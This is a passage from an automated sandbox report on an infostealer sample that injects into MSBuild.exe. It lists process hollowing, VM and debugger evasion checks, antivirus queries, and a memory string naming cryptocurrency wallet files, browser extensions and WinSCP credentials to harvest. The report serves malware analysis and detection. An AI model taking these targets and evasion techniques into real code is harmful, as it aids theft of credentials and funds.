                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00417A40
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A409D push ds; retf 0002h0_2_054A409E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041CDD5 push ecx; ret 4_2_0041CDE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59B536 push ecx; ret 4_2_6C59B549
                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.csHigh entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
                        Source: 0.2.file.exe.5400000.14.raw.unpack, zcrmeG4DKc05Qj8A7l.csHigh entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 5.8 %
                        Source: C:\Users\user\Desktop\file.exe TID: 6200Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_004099F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040A2C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_004156C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040C2E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_00414F80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415A70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040AAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_004153C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040FDA0 GetSystemInfo,wsprintfA,4_2_0040FDA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareD
                        Source: Amcache.hve.10.drBinary or memory string: VMware
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                        Source: file.exeBinary or memory string: T7KKDqemuqJg3uTqm2mj
                        Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-93538
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D12F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402000 VirtualProtect 00000000,00000004,00000100,?4_2_00402000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004176E0 mov eax, dword ptr fs:[00000030h]4_2_004176E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402000 lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenA,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,VirtualProtect,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,4_2_00402000
                        Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041ECC8 SetUnhandledExceptionFilter,4_2_0041ECC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041CAF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C59B66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C59B1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C74AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C74AC62
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040ED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0040ED80
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,4_2_00411400
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_004112F0
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63D000
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000
                        Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11CF008
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C794760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,4_2_6C794760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00401000 cpuid 4_2_00401000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0040FC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_0041A440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040FAE0 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_0040FAE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0040FBC0
                        Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.10.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.10.dr Binary or memory string: msmpeng.exe
                        Source: Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.10.dr Binary or memory string: MsMpEng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match File source: 0.2.file.exe.4579110.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.39e31c0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.3a109f0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.4579110.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.39e31c0.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.45a6940.11.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.45a6940.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.3a109f0.6.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
                        Source: file.exe, 00000000.00000000.1682009085.0000000000022000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: XhJAxXnjj5
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: info.seco
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: MultiDoge
                        Source: MSBuild.exe, 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: seed.seco
                        Source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
